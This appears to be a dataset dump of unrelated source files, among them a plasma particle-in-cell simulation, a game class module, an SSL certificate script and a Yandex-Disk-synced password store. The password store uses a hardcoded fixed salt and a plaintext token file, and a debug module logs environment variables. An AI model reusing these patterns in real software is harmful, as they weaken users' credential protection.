id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
5146746 | <reponame>timsliu/platypus
# pic_1d.py
# 1D particle in cell plasma simulation
#
import numpy as np
import copy
from scipy import fft, ifft
import matplotlib.pyplot as plt
MIN_J = 1e-8 # minimum value for index J when building k array
class PIC_1D:
def __init__(self, params):
# TODO verify it's a valid params set
# random seed
np.random.seed(params["seed"])
self.params = params
# domain parameters
self.dx = params["dx"]
self.dt = params["timestep"]
self.steps = params["steps"] # time steps to run for
self.cells = params["cells"] # number of cells
self.nodes = [x + 1 for x in params["cells"]]
self.n_particles = params["n_particles"] # total number of particles
self.xmax = self.dx[0] * self.cells[0]
self.particle_weight = 1/(self.n_particles/np.prod(self.cells)) # density/particles per cell
# state information
self.electron_x = np.zeros(self.n_particles) # electron positions
self.electron_v = np.zeros(self.n_particles) # electron velocities
self.electron_e = np.zeros(self.n_particles) # e-field at particles
self.ion_x = np.zeros(self.n_particles) # ion positions
self.ion_v = np.zeros(self.n_particles) # ion velocities
self.ne = np.zeros(self.cells) # electron number density at each cell
self.ni = np.zeros(self.cells) # electron number density at each cell
self.rho = np.zeros(self.cells) # charge density at each cell center
self.phi = np.zeros(self.cells) # potential at cell centers
self.batch = [] # batch of particles to follow
# field quantities on nodes
self.e = np.zeros(self.nodes) # electric field at each node
# list of dictionaries holding output values
self.output = {
"electrostatic_energy" :[],
"kinetic_energy": [],
"batch_ke": []
}
def init_x_random(self):
'''randomly initialize the positions of the macroparticles'''
self.electron_x = np.random.rand(self.n_particles) * self.xmax
self.ion_x = np.random.rand(self.n_particles) * self.xmax
return
def init_x_uniform(self):
'''uniformly initialize the positions of the macroparticles'''
self.electron_x = np.linspace(0, self.xmax, num=self.n_particles, endpoint=False)
self.ion_x = np.linspace(0, self.xmax, num=self.n_particles, endpoint=False)
return
def init_v_maxwellian(self):
'''initializes the velocity distribution function as a maxwellian'''
for i in range(self.n_particles):
r1 = max(1e-8, np.random.rand())
r2 = np.random.rand()
self.electron_v[i] = np.sqrt(-np.log(r1)) * np.cos(2 * np.pi * r2)
self.ion_v[i] = 0
return
def init_v_two_stream(self):
'''initializes the velocity distribution of electrons as two
counter propagating streams
inputs: vpos - normalized velocity of positive beam
vneg - normalized velocity of negative beam'''
vpos = self.params["two_stream"]["vpos"]
vneg = self.params["two_stream"]["vneg"]
# randomly select which half is positive
pos_particles = np.random.choice(
range(self.n_particles),
size=int(self.n_particles/2),
replace = False)
# iterate through particles and set the velocities
for i in range(self.n_particles):
if i in pos_particles:
self.electron_v[i] = vpos
else:
self.electron_v[i] = vneg
self.ion_v[i] = 0
return
def init_v_single_stream(self):
'''randomly sets a certain fraction of electrons to an identical
velocity, simulating a single stream
inputs: fraction - percent of particles to set velocity
v - normalized velocity'''
fraction = self.params["single_stream"]["stream_frac"]
v = self.params["single_stream"]["stream_v"]
# randomly select which half is positive
stream_particles = np.random.choice(
range(self.n_particles),
size=int(self.n_particles * fraction),
replace = False)
self.batch = stream_particles
# iterate through particles and set the velocities
for i in range(self.n_particles):
if i in stream_particles:
self.electron_v[i] = v
return
def density_perturbation(self):
'''create a sinusoidal density perturbation
delta_n - perturbation amplitude
k - k wave number of perturbation'''
delta_n = self.params["landau"]["amplitude"]
k = self.params["landau"]["mode"]
for i in range(self.n_particles):
delta_x = delta_n/k * np.sin(k * self.electron_x[i])
self.electron_x[i] += delta_x
while self.electron_x[i] < 0:
self.electron_x[i] += self.xmax
while self.electron_x[i] > self.xmax:
self.electron_x[i] -= self.xmax
def update_ni(self):
'''update the ion density in each cell'''
self.update_n("ion")
return
def update_ne(self):
'''update the electron density in each cell'''
self.update_n("electron")
return
def update_n(self, particle_type):
'''update the particle density
particle_type (str) - "ion" or "electron" '''
# copy the particle array we're interested in
if particle_type == "electron":
particle_x = np.copy(self.electron_x)
elif particle_type == "ion":
particle_x = np.copy(self.ion_x)
else:
raise ValueError("Unrecognized particle type: ".format(particle_type))
# clear the array of densities
densities = np.zeros(self.cells[0])
for x_n in particle_x:
# cell the particle is in
cell = int(np.floor(x_n/self.dx[0]))
# find indices of cells to the left and right that the weight
# will be distributed between
# particle is to the right of cell midpoint
if x_n > cell * self.dx[0] + 0.5 * self.dx[0]:
cell_left = cell
cell_right = cell + 1
# particle is to the left of cell midpoint
else:
cell_left = cell - 1
cell_right = cell
# center of left and right cells
cell_left_x = cell_left * self.dx[0] + 0.5 * self.dx[0]
cell_right_x = cell_right * self.dx[0] + 0.5 * self.dx[0]
# weight to be distributed to left and right cells
weight_left = (cell_right_x - x_n)/self.dx[0] * self.particle_weight
weight_right = (x_n - cell_left_x)/self.dx[0] * self.particle_weight
# get actual cell index, accounting for wraparound
cell_left = cell_left % self.cells[0]
cell_right = cell_right % self.cells[0]
densities[cell_left] += weight_left
densities[cell_right] += weight_right
# copy the cell densities to appropriate array
if particle_type == "electron":
self.ne = copy.deepcopy(densities)
if particle_type == "ion":
self.ni = copy.deepcopy(densities)
return
def update_rho(self):
'''update the charge density'''
raw_rho = self.ni - self.ne # charge density
self.rho = raw_rho - np.mean(raw_rho) # normalize charge density
return
def update_phi(self):
'''update the electric potential at each cell center'''
R = fft(-self.rho) # fft of rho deviation
# build intermediate k array
k = np.zeros(self.cells[0])
for j in range(self.cells[0]):
k[j] = np.pi/self.dx[0] * max(j, MIN_J)/(self.cells[0]/2)
if j >= self.cells[0]/2:
k[j] -= 2 * np.pi/self.dx[0]
# intermediate kappa array
kappa = np.sin(k * self.dx[0]/2)/(self.dx[0]/2)
# intermediate Y array
Y = - R/(kappa * kappa)
Y_hat = ifft(Y)
potential = np.real(Y_hat) # potential is the real part
avg_potential = np.mean(potential)
self.phi = (potential - avg_potential)
return
def update_e(self):
'''update electric field at each node'''
for i in range(self.nodes[0]):
if i == 0:
# use the left potential boundary condition
left_potential = self.phi[-1]
else:
left_potential = self.phi[i-1]
if i == (self.nodes[0] - 1):
# use the right potential boundary condition
right_potential = self.phi[0]
else:
right_potential = self.phi[i]
# E = -(phi_i - phi_i-1)/dx
self.e[i] = -(right_potential - left_potential)/self.dx[0]
return
def update_v(self):
'''update velocity of particles based on electric fields'''
for i in range(self.n_particles):
x_n = self.electron_x[i]
# indices of left and right nodes
node_left = int(np.floor(x_n/self.dx[0]))
node_right = int(np.ceil(x_n/self.dx[0]))
# electric field at the left and right nodes
e_left = self.e[node_left]
e_right = self.e[node_right]
# position of left and right nodes
x_left = node_left * self.dx[0]
x_right = node_right * self.dx[0]
# calculate electric field at particle and update velocity
e_particle = (x_right - x_n)/self.dx[0] * e_left + (x_n - x_left)/self.dx[0] * e_right
self.electron_v[i] -= e_particle * self.dt
def update_x(self):
'''update position of particles based on v_(n + 0.5)'''
for i in range(self.n_particles):
self.electron_x[i] += self.electron_v[i] * self.dt
# particle past boundary condition; circular boundary
while self.electron_x[i] < 0:
self.electron_x[i] += self.xmax
while self.electron_x[i] > self.xmax:
self.electron_x[i] -= self.xmax
return
def calc_bulk_u(self):
'''calculate and save the bulk velocity'''
# TODO
return
def calc_electrostatic_energy(self):
'''calculate and save the electrostatic energy'''
electrostatic_energy = 0
for i in range(self.cells[0]):
e_cell = np.mean([self.e[i], self.e[i + 1]]) # average E field in cell
electrostatic_energy += 0.5 * self.dx[0] * (e_cell ** 2)
# save the value
self.output["electrostatic_energy"].append(electrostatic_energy)
def calc_kinetic_energy(self):
'''calculate and save the kinetic energy'''
ke_energy = 0.5 * self.particle_weight * sum(self.electron_v * self.electron_v)
ke_energy *= np.prod(self.dx) # multiply by ratio of potential energy
# to kinetic energy so total energy is
# constant
self.output["kinetic_energy"].append(ke_energy)
return
def calc_batch_kinetic_energy(self):
'''calculate and save the kinetic energy'''
ke_energy = 0.0
for i in self.batch:
ke_energy += 0.5 * self.particle_weight * self.electron_v[i] * self.electron_v[i]
ke_energy *= np.prod(self.dx)
self.output["batch_ke"].append(ke_energy)
return
def step(self):
'''run the simulation for a single step, updating all parameters;
methods for saving outputs must be called separately'''
self.update_ni() # calculate e and i number densities
#print("Ni: ", self.ni)
self.update_ne()
#print("Ne: ", self.ne)
self.update_rho() # update charge density
#print("Charge density:", self.rho)
#print("Mean charge density:", np.mean(self.rho))
self.update_phi() # calculate cell potential
#print("Potential: ", self.phi)
self.update_e() # calculate electric field at nodes
#print("Electric field: ", self.e)
self.update_v() # calculate velocity of each particle
self.update_x() # update positions
def spectate(self):
'''print velocity, position, electric field of a particle'''
print("x: {:.3f}, v: {:.3f}, e_left: {:.3f}, e_right: {:.3f}".format(
float(self.electron_x[10]),
float(self.electron_v[10]),
float(self.e[int(np.floor(self.electron_x[10]/self.dx[0]))]),
float(self.e[int(np.ceil(self.electron_x[10]/self.dx[0]))])))
| StarcoderdataPython |
8189760 | <reponame>edoipi/TemplePlus
from templeplus.pymod import PythonModifier
from toee import *
import tpdp
import char_class_utils
###################################################
def GetConditionName():
return "Warmage"
print "Registering " + GetConditionName()
classEnum = stat_level_warmage
classSpecModule = __import__('class047_warmage')
###################################################
#### standard callbacks - BAB and Save values
def OnGetToHitBonusBase(attachee, args, evt_obj):
classLvl = attachee.stat_level_get(classEnum)
babvalue = game.get_bab_for_class(classEnum, classLvl)
evt_obj.bonus_list.add(babvalue, 0, 137) # untyped, description: "Class"
return 0
def OnGetSaveThrowFort(attachee, args, evt_obj):
value = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Fortitude)
evt_obj.bonus_list.add(value, 0, 137)
return 0
def OnGetSaveThrowReflex(attachee, args, evt_obj):
value = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Reflex)
evt_obj.bonus_list.add(value, 0, 137)
return 0
def OnGetSaveThrowWill(attachee, args, evt_obj):
value = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Will)
evt_obj.bonus_list.add(value, 0, 137)
return 0
classSpecObj = PythonModifier(GetConditionName(), 0)
classSpecObj.AddHook(ET_OnToHitBonusBase, EK_NONE, OnGetToHitBonusBase, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_FORTITUDE, OnGetSaveThrowFort, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_REFLEX, OnGetSaveThrowReflex, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_WILL, OnGetSaveThrowWill, ())
### Spell casting
def OnGetBaseCasterLevel(attachee, args, evt_obj):
if evt_obj.arg0 != classEnum:
return 0
classLvl = attachee.stat_level_get(classEnum)
evt_obj.bonus_list.add(classLvl, 0, 137)
return 0
def OnLevelupSpellsFinalize(attachee, args, evt_obj):
if evt_obj.arg0 != classEnum:
return 0
classSpecModule.LevelupSpellsFinalize(attachee)
return 0
def OnInitLevelupSpellSelection(attachee, args, evt_obj):
if evt_obj.arg0 != classEnum:
return 0
classSpecModule.InitSpellSelection(attachee)
return 0
def OnLevelupSpellsCheckComplete(attachee, args, evt_obj):
if evt_obj.arg0 != classEnum:
return 0
if not classSpecModule.LevelupCheckSpells(attachee):
evt_obj.bonus_list.add(-1, 0, 137) # denotes incomplete spell selection
return 1
classSpecObj.AddHook(ET_OnGetBaseCasterLevel, EK_NONE, OnGetBaseCasterLevel, ())
classSpecObj.AddHook(ET_OnLevelupSystemEvent, EK_LVL_Spells_Finalize, OnLevelupSpellsFinalize, ())
classSpecObj.AddHook(ET_OnLevelupSystemEvent, EK_LVL_Spells_Activate, OnInitLevelupSpellSelection, ())
classSpecObj.AddHook(ET_OnLevelupSystemEvent, EK_LVL_Spells_Check_Complete, OnLevelupSpellsCheckComplete, ())
#Light Shield Proficiency
def HasLightShieldProficency(attachee, args, evt_obj):
evt_obj.return_val = 1
return 0
lightShieldProficiency = PythonModifier("Light Shield Proficiency", 2) #Spare, Spare
lightShieldProficiency.MapToFeat("Light Shield Proficiency")
lightShieldProficiency.AddHook(ET_OnD20PythonQuery, "Has Light Shield Proficency", HasLightShieldProficency, ())
# Warmage Edge
# Here is how this complicated ability is implimented. First it is increated by a critical but not empower
# Second multi target spells will only get the benefit once. This will effect the first target that takes damage.
# Third area area effect spells get the benefit against each object in their area of effect one time (ice
# storm for example only gets the bonus on the bludgeoning damage). Fourth multi round spells can get the
# benefit each round.
def WarmageBeginRound(attachee, args, evt_obj):
args.set_arg(0, 0)
return 0
def WarmageEdgeOnSpellDamage(attachee, args, evt_obj):
#Only effects warmage spells
spellCastingClass = evt_obj.spell_packet.get_spell_casting_class()
if spellCastingClass != stat_level_warmage:
return 0
prevSpellID = args.get_arg(0)
spellID = evt_obj.spell_packet.spell_id
spEntry = tpdp.SpellEntry(evt_obj.spell_packet.spell_enum)
multiTarget = spEntry.is_base_mode_target(MODE_TARGET_MULTI)
target = evt_obj.target
if multiTarget:
#If the same multi target is doing damage again, no bonus
if prevSpellID == spellID:
return 0
elif evt_obj.spell_packet.spell_enum != spell_melfs_acid_arrow: #Always give the bonus to acid arrow
if target.d20_query_with_data("Warmage Edge Damage Taken", spellID):
return 0
int = attachee.stat_level_get(stat_intelligence)
intMod = (int - 10)/2
#Increase warmage edge damage on a critical hit
if evt_obj.damage_packet.critical_multiplier > 1:
intMod = intMod * 2
if intMod > 0:
evt_obj.damage_packet.bonus_list.add_from_feat(intMod, 0, 137, "Warmage Edge")
args.set_arg(0, spellID)
target.condition_add_with_args("Warmage Edge Damage", spellID)
return 0
warmageEdge = PythonModifier("Warmage Edge", 2) #Previous Spell ID, Spare
warmageEdge.MapToFeat("Warmage Edge")
warmageEdge.AddHook(ET_OnDispatchSpellDamage, EK_NONE, WarmageEdgeOnSpellDamage, ())
warmageEdge.AddHook(ET_OnBeginRound, EK_NONE, WarmageBeginRound, ())
#Warmage edge damage effect
def WarmageDamageBeginRound(attachee, args, evt_obj):
spellID = args.get_arg(0)
args.condition_remove() #Always disapears at the begining of the round
return 0
def TakenWarmageEdgeDamageFromSpellQuery(attachee, args, evt_obj):
spellID = args.get_arg(0)
querySpellID = evt_obj.data1
if spellID == querySpellID:
evt_obj.return_val = 1
return 0
warmageEdgeDamage = PythonModifier("Warmage Edge Damage", 2, False) #Previous Spell ID, Spare
warmageEdgeDamage.AddHook(ET_OnBeginRound, EK_NONE, WarmageDamageBeginRound, ())
warmageEdgeDamage.AddHook(ET_OnD20PythonQuery, "Warmage Edge Damage Taken", TakenWarmageEdgeDamageFromSpellQuery, ())
#Armored Mage
def WarmageSpellFailure(attachee, args, evt_obj):
#Only effects spells cast as a warmage
if evt_obj.data1 != classEnum:
return 0
equip_slot = evt_obj.data2
item = attachee.item_worn_at(equip_slot)
if item == OBJ_HANDLE_NULL:
return 0
if equip_slot == item_wear_armor: # warmage can cast in light armor (and medium armor at level 8 or greater) with no spell failure
warmageLevel = attachee.stat_level_get(stat_level_warmage)
armor_flags = item.obj_get_int(obj_f_armor_flags)
if attachee.d20_query("Improved Armored Casting"):
if (armor_flags & ARMOR_TYPE_NONE) or (armor_flags == ARMOR_TYPE_LIGHT) or (armor_flags == ARMOR_TYPE_MEDIUM) or (warmageLevel > 7):
return 0
else:
if (armor_flags & ARMOR_TYPE_NONE) or (armor_flags == ARMOR_TYPE_LIGHT) or ((armor_flags == ARMOR_TYPE_MEDIUM) and (warmageLevel > 7)):
return 0
if equip_slot == item_wear_shield: # warmage can cast with a light shield (or buclker) with no spell failure
shieldFailure = item.obj_get_int(obj_f_armor_arcane_spell_failure)
if shieldFailure <= 5: #Light shields and bucklers have 5% spell failure
return 0
evt_obj.return_val += item.obj_get_int(obj_f_armor_arcane_spell_failure)
return 0
armoredMage = PythonModifier("Warmage Armored Mage", 2) #Spare, Spare
armoredMage.MapToFeat("Warmage Armored Mage")
armoredMage.AddHook(ET_OnD20Query, EK_Q_Get_Arcane_Spell_Failure, WarmageSpellFailure, ())
| StarcoderdataPython |
3599176 | <filename>Curso/ExMundo2/Ex040ElIf5Media.py
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m = (n1 + n2) / 2
if m >= 7:
print('Sua média é {:.1f} e portanto você está aprovado'.format(m))
elif m < 5:
print('Sua média é {:.1f} e portanto você está reprovado'.format(m))
else:
print('Sua média é {:.1f} e portanto você está de recuperação'.format(m))
| StarcoderdataPython |
9613623 | <gh_stars>10-100
#!/usr/bin/env python
from __future__ import print_function
import os
import sys
import socket
import posix
import shutil
from subprocess import (Popen, PIPE)
IRODS_SSL_DIR = '/etc/irods/ssl'
def create_ssl_dir():
save_cwd = os.getcwd()
silent_run = { 'shell': True, 'stderr' : PIPE, 'stdout' : PIPE }
try:
if not (os.path.exists(IRODS_SSL_DIR)):
os.mkdir(IRODS_SSL_DIR)
os.chdir(IRODS_SSL_DIR)
Popen("openssl genrsa -out irods.key 2048",**silent_run).communicate()
with open("/dev/null","wb") as dev_null:
p = Popen("openssl req -new -x509 -key irods.key -out irods.crt -days 365 <<EOF{_sep_}"
"US{_sep_}North Carolina{_sep_}Chapel Hill{_sep_}UNC{_sep_}RENCI{_sep_}"
"{host}{_sep_}<EMAIL>{_sep_}EOF\n""".format(
host = socket.gethostname(), _sep_="\n"),shell=True, stdout=dev_null, stderr=dev_null)
p.wait()
if 0 == p.returncode:
Popen('openssl dhparam -2 -out dhparams.pem',**silent_run).communicate()
return os.listdir(".")
finally:
os.chdir(save_cwd)
def test(opts,args=()):
if args: print ('warning: non-option args are ignored',file=sys.stderr)
affirm = 'n' if os.path.exists(IRODS_SSL_DIR) else 'y'
if not [v for k,v in opts if k == '-f'] and affirm == 'n' and posix.isatty(sys.stdin.fileno()):
try:
input_ = raw_input
except NameError:
input_ = input
affirm = input_("This will overwrite directory '{}'. Proceed(Y/N)? ".format(IRODS_SSL_DIR))
if affirm[:1].lower() == 'y':
shutil.rmtree(IRODS_SSL_DIR,ignore_errors=True)
print("Generating new '{}'. This may take a while.".format(IRODS_SSL_DIR), file=sys.stderr)
ssl_dir_files = create_ssl_dir()
print('ssl_dir_files=', ssl_dir_files)
if __name__ == '__main__':
import getopt
test(*getopt.getopt(sys.argv[1:],'f')) # f = force
| StarcoderdataPython |
88633 | <gh_stars>0
#!/usr/bin/env python2
import os
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext as build_ext_orig
from distutils.file_util import copy_file
class CMakeExtension(Extension):
def __init__(self, name):
Extension.__init__(
self,
name,
sources=[],
)
class build_ext(build_ext_orig):
def run(self):
for ext in self.extensions:
self.build_cmake(ext)
def build_cmake(self, ext):
self.spawn(['cmake', '.'])
self.spawn(['make', 'flann'])
dest = os.path.join(self.build_lib, "pyflann", "libflann.so")
copy_file("lib/libflann.so.1.9.1", dest)
setup(
name='incoproflann',
version='1.1',
description='Fast Library for Approximate Nearest Neighbors',
author='<NAME>',
author_email='<EMAIL>',
license='BSD',
url='http://www.cs.ubc.ca/~mariusm/flann/',
packages=['pyflann'],
ext_modules=[CMakeExtension('pyflann/libflann')],
package_dir={'pyflann': 'src/python/pyflann'},
cmdclass={
'build_ext': build_ext,
}
)
| StarcoderdataPython |
5020520 | <filename>pardet/models/par_detectors/strongbaseline.py
from collections import OrderedDict
import torch
import torch.nn as nn
from ..builder import CLASSIFIERS, PARNETS, build_bockbone, build_classifier, build_loss
@CLASSIFIERS.register_module()
class BaseClassifier(nn.Module):
def __init__(self, nattr):
super().__init__()
self.logits = nn.Sequential(
nn.Linear(2048, nattr),
nn.BatchNorm1d(nattr)
)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
def fresh_params(self):
return self.parameters()
def forward(self, feature):
feat = self.avg_pool(feature).view(feature.size(0), -1)
x = self.logits(feat)
return x
@PARNETS.register_module()
class StrongBaseline(nn.Module):
def __init__(self, backbone, classifier, loss):
super(StrongBaseline, self).__init__()
self.backbone = build_bockbone(backbone)
self.classifier = build_classifier(classifier)
self.loss = build_loss(loss)
def fresh_params(self):
params = self.classifier.fresh_params()
return params
def finetune_params(self):
return self.backbone.parameters()
def extract_feat(self, img):
x = self.backbone(img)
return x
def forward_train(self, **kwargs):
feat_map = self.extract_feat(kwargs['img'].cuda())
logits = self.classifier(feat_map)
losses = dict()
loss = self.loss(logits, kwargs['gt_label'].cuda(), kwargs['weights'])
losses.update(loss)
return losses
def forward(self, return_loss=True, **kwargs):
if return_loss:
return self.forward_train(**kwargs)
else:
return self.forward_test(**kwargs)
def train_step(self, data, optimizer, **kwargs):
losses = self(**data, **kwargs)
loss, log_vars = self._parse_losses(losses)
outputs = dict(
loss=loss, log_vars=log_vars, num_samples=len(data['img_name']))
return outputs
def val_step(self, data, optimizer, **kwargs):
losses = self(**data, **kwargs)
loss, log_vars = self._parse_losses(losses)
outputs = dict(
loss=loss, log_vars=log_vars, num_samples=len(data['img_name']))
return outputs
def _parse_losses(self, losses):
log_vars = OrderedDict()
for loss_name, loss_value in losses.items():
if isinstance(loss_value, torch.Tensor):
log_vars[loss_name] = loss_value.mean()
elif isinstance(loss_value, list):
log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value)
else:
raise TypeError(f'{loss_name} is not a tensor or list of tensors')
loss = sum(_value for _key, _value in log_vars.items() if 'loss' in _key)
log_vars['loss'] = loss
for loss_name, loss_value in log_vars.items():
log_vars[loss_name] = loss_value.item()
return loss, log_vars
def forward_test(self, **kwargs):
imgs = kwargs.pop('img')
num_augs = len(imgs)
if num_augs == 1:
return self.simple_test(imgs, **kwargs)
else:
return self.aug_test(imgs, **kwargs)
def simple_test(self, img, **kwargs):
feat_map = self.extract_feat(img.cuda())
logit = self.classifier(feat_map)
prob = torch.sigmoid(logit).detach().cpu().numpy()
gt_label = kwargs['gt_label'].detach().cpu().numpy()
result = dict(prob=prob, gt_label=gt_label)
return result
def aug_test(self, imgs, **kwargs):
# TODO: support test augmentation for predefined proposals
pass
| StarcoderdataPython |
4891674 | <filename>protonfixes/debug.py
""" Prints debug info if the environment variable DEBUG is 1
"""
import os
import sys
import shutil
# pylint: disable=E0611
from .protonmain_compat import protonmain
from .protonversion import PROTON_VERSION
from .logger import log
os.environ['DEBUG'] = '1'
def show_debug_info():
""" Show various debug info """
check_args = [
'iscriptevaluator.exe' in sys.argv[2],
'getcompatpath' in sys.argv[1],
'getnativepath' in sys.argv[1],
]
if any(check_args):
log.debug(str(sys.argv))
return
line = '---------------------------------------'
log.debug('---- begin protontricks debug info ----')
log.debug('Proton Python Version:')
log.debug(sys.executable)
log.debug(sys.version)
log.debug(line)
log.debug('System Python Version:')
try:
log.debug(shutil.which(os.readlink(shutil.which('python'))))
except: #pylint: disable=W0702
log.debug(shutil.which('python'))
log.debug(line)
log.debug('Proton Version:')
log.debug(PROTON_VERSION)
log.debug(line)
log.debug('Proton Directory:')
log.debug(protonmain.g_proton.base_dir)
log.debug(line)
ignorevars = [
'SteamUser',
'OLDPWD',
'SteamAppUser',
'LS_COLORS',
]
log.debug('Environment Variables:')
for key, value in os.environ.items():
if key not in ignorevars:
log.debug(key + '=' + value)
log.debug(line)
log.debug('Command Line:')
log.debug(sys.argv)
log.debug('----- end protontricks debug info -----')
show_debug_info()
| StarcoderdataPython |
5126378 | import base64
import json
import os
import webbrowser
from datetime import datetime, timezone
from typing import Optional
from PyQt5 import QtWidgets
import yadisk
from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
NO_YANDEX_DISK = 0
NO_FILE_IN_CLOUD = 1
CLOUD_FILE_OLDER = 2
CLOUD_FILE_NEWER = 3
FILES_IDENTICAL = 4
NO_LOCAL_FILE = 5
class IncorrectPassword(Exception):
pass
class FileCorrupted(Exception):
pass
class UserCancelException(Exception):
pass
class BaseFile(QtWidgets.QWidget):
yandex_disk: Optional[yadisk.YaDisk]
status: int
base_changed: bool
def __init__(self, *args):
super().__init__(*args)
self.yandex_disk = None
self.main_password = ''
self._passwords = {}
self.status = 0
self.base_changed = False
self.generate_salt()
def generate_salt(self):
self.salt = b'\x82\xe1\x85~!\xaf\xd5\xd2}\xbc#\xf0\x0f\xed\x02\xf9'
@property
def passwords(self):
return self._passwords
def connect_cloud(self):
try:
with open('yadisk-token.txt') as f:
yadisk_token = f.readline().strip()
except FileNotFoundError:
self.get_new_token()
return
self.yandex_disk = yadisk.YaDisk(token=yadisk_token)
if not self.yandex_disk.check_token():
mb = QtWidgets.QMessageBox()
mb.setWindowTitle('Ошибка')
mb.setText('Токен Яндекс-диска некорректен.\nПолучить новый?')
ok = mb.addButton('OK', QtWidgets.QMessageBox.AcceptRole)
cancel = mb.addButton('Отмена', QtWidgets.QMessageBox.RejectRole)
mb.exec()
if mb.clickedButton() == ok:
self.get_new_token()
else:
self.yadisk_error_dialog()
def get_new_token(self):
try:
with open('yadisk-secret.txt') as f:
application_id = f.readline().strip()
application_secret = f.readline().strip()
except FileNotFoundError:
self.yadisk_error_dialog('Данные Yandex OAuth не найдены. '
'Чтобы зарегистрировать приложение, '
'перейдите по адресу: https://oauth.yandex.ru '
'и сохраните выданные id и пароль в файл '
'yadisk-secret.txt')
return
self.yandex_disk = yadisk.YaDisk(application_id, application_secret)
url = self.yandex_disk.get_code_url()
webbrowser.open(url)
while True:
code, ok = QtWidgets.QInputDialog.getText(
self,
'Подтверждение',
'Введите код подтверждения, полученный от Яндекс-диска:'
)
if ok:
try:
response = self.yandex_disk.get_token(code)
break
except yadisk.exceptions.BadRequestError:
mb = QtWidgets.QMessageBox()
mb.setWindowTitle('Ошибка')
mb.setText('Неверный код.')
ok = mb.addButton('OK', QtWidgets.QMessageBox.AcceptRole)
mb.exec()
if mb.clickedButton() == ok:
continue
else:
self.yadisk_error_dialog()
return
yadisk_token = self.yandex_disk.token = response.access_token
with open('yadisk-token.txt', 'w') as f:
f.write(yadisk_token)
def yadisk_error_dialog(self, msg=None):
msg = msg or 'Яндекс-диск недоступен.'
mb = QtWidgets.QMessageBox()
mb.setWindowTitle('Ошибка')
mb.setText(msg + '\nРаботать оффлайн?')
ok = mb.addButton('OK', QtWidgets.QMessageBox.AcceptRole)
cancel = mb.addButton('Отмена', QtWidgets.QMessageBox.RejectRole)
mb.exec()
if mb.clickedButton() == ok:
self.yandex_disk = None
else:
raise UserCancelException
def check_file(self):
if not self.yandex_disk:
self.status = NO_YANDEX_DISK
return
for file in self.yandex_disk.listdir('app:/'):
if file['name'] == 'pwd.bin':
created = file['created']
break
else:
self.status = NO_FILE_IN_CLOUD
return
try:
local_file_date = datetime.fromtimestamp(
os.path.getmtime('pwd.bin'), timezone.utc
)
except FileNotFoundError:
self.status = NO_LOCAL_FILE
return
if created < local_file_date:
self.status = CLOUD_FILE_OLDER
elif created > local_file_date:
self.status = CLOUD_FILE_NEWER
else:
self.status = FILES_IDENTICAL
def download_file(self):
self.yandex_disk.download('app:/pwd.bin', 'pwd.bin')
def read_file(self):
try:
with open('pwd.bin', 'rb') as f:
data = f.read()
except FileNotFoundError:
raise
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=self.salt,
iterations=100000,
backend=default_backend()
)
key = base64.urlsafe_b64encode(kdf.derive(self.main_password.encode(encoding='utf-8')))
f = Fernet(key)
try:
data = f.decrypt(data)
except InvalidToken:
raise IncorrectPassword
try:
self._passwords = json.loads(data)
except ValueError:
raise FileCorrupted
def add_new_entry(self, name, login, password):
self._passwords[name] = (login, password)
self.base_changed = True
def remove_entry(self, name):
self._passwords.pop(name)
self.base_changed = True
def save_file(self):
data = json.dumps(self._passwords).encode(encoding='utf-8')
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=self.salt,
iterations=100000,
backend=default_backend()
)
key = base64.urlsafe_b64encode(kdf.derive(self.main_password.encode(encoding='utf-8')))
f = Fernet(key)
with open('pwd.bin', 'wb') as file:
file.write(f.encrypt(data))
def upload_file(self):
if self.yandex_disk:
if any(
file['name'] == 'pwd.bin'
for file in self.yandex_disk.listdir('app:/')
):
self.yandex_disk.remove('app:/pwd.bin')
self.yandex_disk.upload('pwd.bin', 'app:/pwd.bin')
def create_base(self):
self._passwords = {}
| StarcoderdataPython |
8062324 | from flask import Blueprint, request
from rapidpro_webhooks.apps.core.decorators import limit
from rapidpro_webhooks.apps.core.exceptions import VoucherException
from rapidpro_webhooks.apps.core.helpers import create_response
from rapidpro_webhooks.apps.vouchers.models import Voucher
voucher_bp = Blueprint('voucher', __name__)
@voucher_bp.route('/', methods=['GET'])
def ureport_bp():
return create_response({'app': 'Voucher'})
@voucher_bp.route('/validate', methods=['POST'])
@limit(max_requests=10000, group="voucher", by='ip')
def validate_voucher():
response = {'validity': 'invalid'}
data = request.json or request.form
code = data.get('text')
phone = data.get('phone')
flow = data.get('flow')
try:
Voucher.redeem(code, phone, flow)
response['validity'] = 'valid'
except VoucherException as e:
response['reason'] = str(e)
return create_response(response)
| StarcoderdataPython |
1806487 | <filename>apps/shop/urls.py
from django.conf.urls import url, include
from .views import shop,detail
urlpatterns = [
url(r'^$', shop, name='index'),
url(r'^detail$', detail, name='detail'),
url(r'^cart/', include('apps.shop.cart.urls', namespace='cart')), # 购物车模块
]
| StarcoderdataPython |
6556727 | <gh_stars>0
from django.http import HttpResponse
def dashboard(request):
return HttpResponse("Hello, world. You're at the dashboard index.") | StarcoderdataPython |
115503 | <reponame>rajalokan/cloudify-ansible-plugin
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# Built-in Imports
import os
